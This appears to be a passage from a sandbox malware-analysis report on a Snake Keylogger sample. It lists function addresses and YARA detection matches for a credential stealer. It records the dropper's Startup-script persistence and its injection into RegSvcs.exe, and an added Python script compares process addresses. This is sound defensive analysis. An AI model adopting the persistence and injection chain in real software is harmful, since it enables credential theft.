                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0124C738
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_012476F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_012469A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0124E988
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01249A20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0124CA08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0124CCD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0124CFAA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01243E09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0124F961
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0124E97A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_012429EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01243AB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066E1E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066E17A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066EFC68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066E9C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066E9548
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066EE258
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066E0B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066E5028
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066E2968
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066E1E70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066EDE00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066EE6AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066EE6A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066EE6B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066EEF60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066EEF51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066E178F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066ECCA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066ED540
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066ED550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066EDDFF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066EDDF1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066EE249
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066EEAF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066E9328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066E0B20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066EEB08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066E9BFA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066E8BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066EF3B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066E8B91
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066E0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066E0006
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066EF801
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066E5018
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066EF810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066ED0F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066E2959
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066ED9A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_066ED999
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 6_2_01B41B78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0189C146
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01895362
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0189D278
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0189C468
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0189C738
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0189E988
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_018969A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0189CA08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01899DE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0189CCD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0189CFAA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01896FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_018929EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_018939F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0189F961
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0189E97A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01893E09
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: String function: 002D0AE3 appears 70 times
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: String function: 002D8900 appears 42 times
                Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: String function: 002B7DE1 appears 35 times
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: String function: 00027DE1 appears 35 times
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: String function: 00040AE3 appears 70 times
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: String function: 00048900 appears 42 times
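The function addresses reported for 6BRa130JDj.exe (process 0) and for the dropped ectosphere.exe (process 2) differ by the same constant throughout the listing: 0_2_002BE6A0 against 2_2_0002E6A0, 0_2_003303DA against 2_2_000A03DA, and the string functions 002D0AE3 / 002D8900 / 002B7DE1 against 00040AE3 / 00048900 / 00027DE1. That is the pattern of one PE image loaded at two different bases, so the dropped file runs the same AutoIt stub code as the submitted sample. The Python below is an added worked example, not part of the Joe Sandbox report: it parses "Code function" lines, finds the delta that maps the most addresses of one process onto the other, and lists the addresses that do not follow it, which are the ones outside the image (0_2_0116BF88 and 2_2_00F6E600 here, in heap or unpacked regions). The embedded sample lines are a constructed subset of the listing above. A matching delta shows the two processes run the same code; to show the dropped file is byte-identical to the dropper, compare the file hashes from the report's dropped-files section.

```python
import re
from collections import Counter

# "Code function" entries name a function as <process>_<run>_<address>.  The
# regex takes the first address on the line, so it also copes with the fused
# "0_2_002BE6A00_2_002BE6A0" form that the report export produces.
FUNC_RE = re.compile(r"Code function:\s*(\d+)_\d+_([0-9A-Fa-f]{8})")


def parse_code_functions(text: str) -> dict:
    """Map process id -> set of function start addresses (as ints)."""
    funcs = {}
    for line in text.splitlines():
        m = FUNC_RE.search(line)
        if m:
            funcs.setdefault(int(m.group(1)), set()).add(int(m.group(2), 16))
    return funcs


def rebase_match(addrs_a: set, addrs_b: set) -> dict:
    """Find the constant delta that maps the most addresses of A onto B.

    When two processes run the same PE image at different bases, every
    in-image function of A lands on a function of B after subtracting
    (base_A - base_B).  Addresses in heap or unpacked regions do not follow
    that delta and are returned as unmatched on either side.
    """
    if not addrs_a or not addrs_b:
        raise ValueError("both processes need at least one function address")
    deltas = Counter(a - b for a in addrs_a for b in addrs_b)
    delta, _ = deltas.most_common(1)[0]
    matched = {a for a in addrs_a if a - delta in addrs_b}
    return {
        "delta": delta,
        "matched": len(matched),
        "total_a": len(addrs_a),
        "unmatched_a": sorted(addrs_a - matched),
        "unmatched_b": sorted(addrs_b - {a - delta for a in matched}),
    }


def compare_processes(text: str, pid_a: int, pid_b: int) -> dict:
    """Parse report text and rebase-match the functions of two processes."""
    funcs = parse_code_functions(text)
    return rebase_match(funcs[pid_a], funcs[pid_b])


# Constructed sample: a subset of the "Code function" lines from the listing
# above (process 0 = 6BRa130JDj.exe, process 2 = ectosphere.exe), including
# the one address on each side that lies outside the PE image.
REPORT_LINES = r"""
Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002BE6A0
Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002DD975
Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002BFCE0
Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_003303DA
Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_00318889
Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002DBDA6
Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_002D1D90
Source: C:\Users\user\Desktop\6BRa130JDj.exe Code function: 0_2_0116BF88
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_0002E6A0
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_0004D975
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_0002FCE0
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_000A03DA
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_00088889
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_00041D90
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_0004BDA6
Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe Code function: 2_2_00F6E600
"""

if __name__ == "__main__":
    r = compare_processes(REPORT_LINES, 0, 2)
    print(f"delta 0x{r['delta']:X}: {r['matched']}/{r['total_a']} functions "
          f"of process 0 rebase onto process 2")
    print("outside the image:",
          [hex(a) for a in r["unmatched_a"]], [hex(b) for b in r["unmatched_b"]])
```

Feed it the full "Code function" listing from a report (copied as text) to get the same answer over all 34 pairs; the RegSvcs.exe addresses (processes 3 and 7) will not line up with either AutoIt process, which is expected since that code is the injected .NET payload, not the stub.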
                Source: 6BRa130JDj.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 6.2.ectosphere.exe.39f0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.ectosphere.exe.31e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 6.2.ectosphere.exe.39f0000.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.ectosphere.exe.31e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 6.2.ectosphere.exe.39f0000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.ectosphere.exe.31e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 2.2.ectosphere.exe.31e0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 2.2.ectosphere.exe.31e0000.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.ectosphere.exe.31e0000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 6.2.ectosphere.exe.39f0000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 6.2.ectosphere.exe.39f0000.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 6.2.ectosphere.exe.39f0000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000003.00000002.4526688861.0000000000423000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000002.00000002.2132554005.00000000031E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000006.00000002.2294799586.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: Process Memory Space: ectosphere.exe PID: 2848, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegSvcs.exe PID: 2804, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: ectosphere.exe PID: 2920, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/6@3/3
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0031A06A GetLastError,FormatMessageW,0_2_0031A06A
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_003081CB AdjustTokenPrivileges,CloseHandle,0_2_003081CB
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_003087E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_003087E1
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000781CB AdjustTokenPrivileges,CloseHandle,2_2_000781CB
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeCode function: 2_2_000787E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_000787E1
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0031B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0031B333
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_0032EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0032EE0D
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_003283BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_003283BB
                Source: C:\Users\user\Desktop\6BRa130JDj.exeCode function: 0_2_002B4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_002B4E89
                Source: C:\Users\user\Desktop\6BRa130JDj.exeFile created: C:\Users\user\AppData\Local\AlleneJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                Source: C:\Users\user\Desktop\6BRa130JDj.exeFile created: C:\Users\user\AppData\Local\Temp\aut235A.tmpJump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs"
                Source: 6BRa130JDj.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\6BRa130JDj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RegSvcs.exe, 00000003.00000002.4529175077.0000000002F18000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4529357872.00000000035A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 6BRa130JDj.exeReversingLabs: Detection: 75%
                Source: C:\Users\user\Desktop\6BRa130JDj.exeFile read: C:\Users\user\Desktop\6BRa130JDj.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\6BRa130JDj.exe "C:\Users\user\Desktop\6BRa130JDj.exe"
                Source: C:\Users\user\Desktop\6BRa130JDj.exeProcess created: C:\Users\user\AppData\Local\Allene\ectosphere.exe "C:\Users\user\Desktop\6BRa130JDj.exe"
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\6BRa130JDj.exe"
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Allene\ectosphere.exe "C:\Users\user\AppData\Local\Allene\ectosphere.exe"
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Allene\ectosphere.exe"
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\6BRa130JDj.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Section loaded: version.dll
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Section loaded: mpr.dll
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Section loaded: wininet.dll
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Local\Allene\ectosphere.exe | Section loaded: wldp.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
